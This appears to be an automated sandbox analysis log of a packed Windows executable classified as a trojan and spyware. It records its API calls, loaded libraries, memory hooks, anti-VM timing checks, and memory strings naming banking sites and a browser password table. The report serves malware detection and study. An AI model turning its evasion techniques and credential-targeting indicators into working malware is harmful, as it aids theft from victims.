Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49712 version: TLS 1.2

            System Summary

            Source: LisectAVT_2403002A_236.exe | Static PE information: .vmp0 and .vmp1 section names
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E6060 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C9080 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003D20C1 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C4280 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C541A NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E5440 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E24B2 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E5640 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C46B7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C56F7 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E27AF NtOpenSection
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E27F1 NtMapViewOfSection
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E67D0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E5810 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E286A NtClose
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CD860 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E5940 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E2987 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E5BD0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C4D10 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E5D40 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C8E50 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CCF46 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E0F80 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003DF1E0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E1220 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C2277 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C7305 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E6400 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E14A0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C6492 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CC5F0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C960A NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E1600 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E1710 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C2700 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CC765 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CA762 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C6790 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E1840 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CA880 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E1950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E5AB0 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C7C59 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E2C52 NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C9C41 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CEDB2 NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003D0F04 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E6060
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003D12E2
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B4640
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CD860
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CCF46
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B51F0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B3240
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003D2382
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CF3FD
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003E6400
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B64F0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003CD622
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C960A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B1700
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_0040F87F
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C3A27
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C7A8C
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B7B20
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B3C60
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C9C41
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003BFDB0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003D6D8E
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B2E70
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003B5F30
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003D0F04
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003C2F77
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003DEF80
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: String function: 003B8560 appears 44 times
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: String function: 003BFF60 appears 154 times
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: String function: 0040B648 appears 35 times
            Source: LisectAVT_2403002A_236.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: LisectAVT_2403002A_236.exe | Binary or memory string: %p.slnB
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372778166.0000000003924000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: LisectAVT_2403002A_236.exe | String found in binary or memory: gRAIjEhiRwIjGFyMaK/eUulv3FK6RznFPxa13xzZPGcI8Ndq0kjBPDdM8VeCYp5RRM0+dYlJPh/ADd756Sj6Q6imTq57Sd6eekiPUU7JQT424emp4HFR+4gRT8o4EU/lhCaZMr2BK3bVgyhghLuqtpFxUWpFH1TBljBUZtSeGqeIIGabyB8cwBTUjVEs20rKyuHwHX6O548RE8iltT+VTZlg+tVd+qZNsjAr1Wwebo4o0Uqm7NVKZuzRSGXtgpNJUYaQ
            Source: LisectAVT_2403002A_236.exe | String found in binary or memory: q1e2Od4OTFHaXYmrA4aKVUmbiQ4n4+MZLmROvnJ6yzezSSPinQzhbMTdDO9znHdTFLV9oT2ILVkKv+VZz7xhndv5l59fQFVfnl4yeuSiVk+jiJVF0Mr52dH/adDcDoEL+0QvC82BBNvNfiDcOPzSbEn8KbKPFXmSz6flFNV+b2z0Z0nzAmDT941n65Rq3W6uUqPdzrn1rqo0ZhPNJhXpCbZX4iwhntgZ3otzlgZDLr9Rw4cWO50llt0fwf/3t/Dz/sxu
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | File read: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: wtsapi32.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Section loaded: ondemandconnroutehelper.dll
            Source: LisectAVT_2403002A_236.exe | Static file information: File size 5735941 > 1048576
            Source: LisectAVT_2403002A_236.exe | Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x577c00
            Source: LisectAVT_2403002A_236.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1
            Source: LisectAVT_2403002A_236.exe | Static PE information: section name: .vmp0
            Source: LisectAVT_2403002A_236.exe | Static PE information: section name: .vmp1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F704F push esi; ret 0_2_003F7055
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F708D push ebp; ret 0_2_003F70E4
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F5121 push esi; ret 0_2_003F5122
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F72F3 push ebp; ret 0_2_003F72F8
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F62C6 push esi; ret 0_2_003F62DE
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F75D2 push edi; ret 0_2_003F75D4
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F66BB push ebp; ret 0_2_003F66C2
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_0040B68D push ecx; ret 0_2_0040B6A0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F67F5 push esi; ret 0_2_003F67FE
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F6836 push esi; ret 0_2_003F683C
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F889C push ebp; ret 0_2_003F88A1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F793D push edi; ret 0_2_003F7945
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F6A3B push ebp; ret 0_2_003F6A3C
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F6A39 push ebp; ret 0_2_003F6A3A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_003F6A33 push esi; ret 0_2_003F6A38
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Code function: 0_2_00409FD0 push ecx; ret 0_2_00409FE3

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Memory written: PID: 6236 base: DF0005 value: E9 8B 2F 75 76
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Memory written: PID: 6236 base: 77542F90 value: E9 7A D0 8A 89
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | System information queried: FirmwareTableInformation
            Source: LisectAVT_2403002A_236.exe, LisectAVT_2403002A_236.exe, 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: ?SBIEDLL.DLL
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | RDTSC instruction interceptor: First address: 946311 second address: 89BEFD instructions: 0x00000000 rdtsc 0x00000002 rol cl, 1 0x00000004 shrd ax, di, 00000068h 0x00000009 ror al, FFFFFFA0h 0x0000000c add cl, FFFFFFFEh 0x0000000f not dl 0x00000011 mov eax, ebp 0x00000013 lahf 0x00000014 not cl 0x00000016 cwd 0x00000018 dec cl 0x0000001a xor bl, cl 0x0000001c stc 0x0000001d rcr dl, cl 0x0000001f mov eax, dword ptr [esp+ecx] 0x00000022 lea ebp, dword ptr [ebp-00000004h] 0x00000028 bsr edx, ebp 0x0000002b mov dword ptr [ebp+00h], eax 0x0000002f sub edi, 00000004h 0x00000035 shr dx, cl 0x00000038 sub dx, 1519h 0x0000003d mov edx, dword ptr [edi] 0x0000003f cmc 0x00000040 cmp esp, ebp 0x00000042 xor edx, ebx 0x00000044 cmc 0x00000045 rol edx, 02h 0x00000048 stc 0x00000049 cmc 0x0000004a cmp ebx, edi 0x0000004c lea edx, dword ptr [edx+360718EFh] 0x00000052 test ch, FFFFFFB5h 0x00000055 cmp ebx, 53A90A0Dh 0x0000005b stc 0x0000005c not edx 0x0000005e cmp bl, dh 0x00000060 cmp dl, FFFFFFFBh 0x00000063 lea edx, dword ptr [edx+25193D95h] 0x00000069 xor ebx, edx 0x0000006b jmp 00007FC658F8C32Ch 0x00000070 add esi, edx 0x00000072 jmp 00007FC6591E2D61h 0x00000077 lea eax, dword ptr [esp+60h] 0x0000007b cmp ebp, eax 0x0000007d jmp 00007FC6591A71BDh 0x00000082 ja 00007FC65950681Dh 0x00000088 jmp esi 0x0000008a sub edi, 00000001h 0x00000090 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | RDTSC instruction interceptor: First address: 8F202E second address: 8F2042 instructions: 0x00000000 rdtsc 0x00000002 movsx ecx, di 0x00000005 mov ebp, esp 0x00000007 push edi 0x00000008 push esi 0x00000009 inc ecx 0x0000000a dec bx 0x0000000d mov ecx, FFFB0000h 0x00000012 xchg ebp, ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | RDTSC instruction interceptor: First address: 8969E4 second address: 8969ED instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cbw 0x00000005 pop edi 0x00000006 xchg edx, esi 0x00000008 pop ebx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | RDTSC instruction interceptor: First address: 60051B second address: 60052F instructions: 0x00000000 rdtsc 0x00000002 movsx ecx, di 0x00000005 mov ebp, esp 0x00000007 push edi 0x00000008 push esi 0x00000009 inc ecx 0x0000000a dec bx 0x0000000d mov ecx, FFFB0000h 0x00000012 xchg ebp, ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | RDTSC instruction interceptor: First address: 65CFBC second address: 65CFC5 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cbw 0x00000005 pop edi 0x00000006 xchg edx, esi 0x00000008 pop ebx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe TID: 4952 | Thread sleep time: -210000s >= -30000s
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696497155j
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1360508594.0000000001408000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.0000000001407000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1463953963.0000000001409000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.0000000001407000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696497155o
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463772710.00000000013AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe | Binary or memory string: 9SDokXWuT7k/o0zmFdI+5yZXyfjdDVtvdBCKQMC7RUN74ZnXXnXfhxjfIuiZlHWLOEZh7yU2OUXaC0KOu1lA7guRD8jUl+YL/jV4e4s8Af3Yf0SL+EH9Nir8/I/6cgr8AuehgFsatiaOZiP5ud66KrfNQakFogGwqi01OGshxNLlXk75qdnYqEmja4bFX50KvIXsUhbKrnbOpHRo5rei0yg1qt3msWkBojOykFtdII2ep8Ti5TC6idfMCnds9Npph6Fq
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696497155x
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.000000000394B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696497155p
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe | Binary or memory string: WtvuF+P406voTx9Wltl3E/5lGVHZO7Qh5ejQhhFihjaCUi6MEor4Vj/NhscRXP5vyZCubEizzJAyXtsIMrKDuopDcRMMFbv6vBv6z++TpP7ZBgP1ako6UXVMcir1+swte3aZvpyZd+T7mVpjZqlgwRH3Ayl5z1nbXp6eqzQwKdul+SvLGL+tLe/jPr5yXn5sujJvEz0PvGAL9aK/teXD3kJlu1LvwMFdtjHsCSYee9T7mpKGgbpYqSMjRK1UvNA3tykU
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1373080900.000000000393D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
